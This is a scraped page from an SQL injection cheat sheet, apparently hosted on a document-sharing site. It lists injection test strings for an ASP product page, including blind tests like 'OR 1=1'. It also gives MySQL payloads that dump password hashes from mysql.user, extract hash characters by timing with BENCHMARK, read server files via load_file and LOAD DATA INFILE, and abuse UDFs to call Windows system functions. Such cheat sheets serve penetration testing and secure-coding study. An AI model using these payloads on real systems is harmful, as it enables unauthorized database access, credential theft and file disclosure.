Sql Injection Cheat Sheet Page 15
ADVERTISEMENT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18Clear SQL Injection Tests
These tests are simply good for blind sql injection and silent attacks.
1.
product.asp?id=4 (SMO)
a.
product.asp?id=5-1
b.
product.asp?id=4 OR 1=1
2.
product.asp?name=Book
a.
product.asp?name=Bo’%2b’ok
b.
product.asp?name=Bo’ || ’ok (OM)
c.
product.asp?name=Book’ OR ‘x’=’x
Some Extra MySQL Notes
•
Sub Queries are working only MySQL 4.1+
•
Users
o
SELECT User,Password FROM mysql.user;
•
SELECT 1,1 UNION SELECT
IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0)
User,Password FROM mysql.user WHERE User = ‘root’;
•
SELECT ... INTO DUMPFILE
o
Write query into a new file (can not modify existing
files)
•
UDF Function
o
create function LockWorkStation returns integer soname
'user32';
o
select LockWorkStation();
o
create function ExitProcess returns integer soname
'kernel32';
o
select exitprocess();
•
SELECT USER();
•
SELECT password,USER() FROM mysql.user;
•
First byte of admin hash
o
SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE
user_group = 1;
•
Read File
o
query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
•
MySQL Load Data inifile
By default it’s not avaliable !
o
create table foo( line blob );
load data infile 'c:/boot.ini' into table foo;
select * from foo;
•
More Timing in MySQL
•
select benchmark( 500000, sha1( 'test' ) );
•
query.php?user=1+union+select+benchmark(500000,sha1
(0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1
•
select if( user() like 'root@%', benchmark(100000,sha1('test')),
'false' );
Enumeration data, Guessed Brute Force
ADVERTISEMENT
0 votes
Related Articles
Related forms
Related Categories
Parent category: Education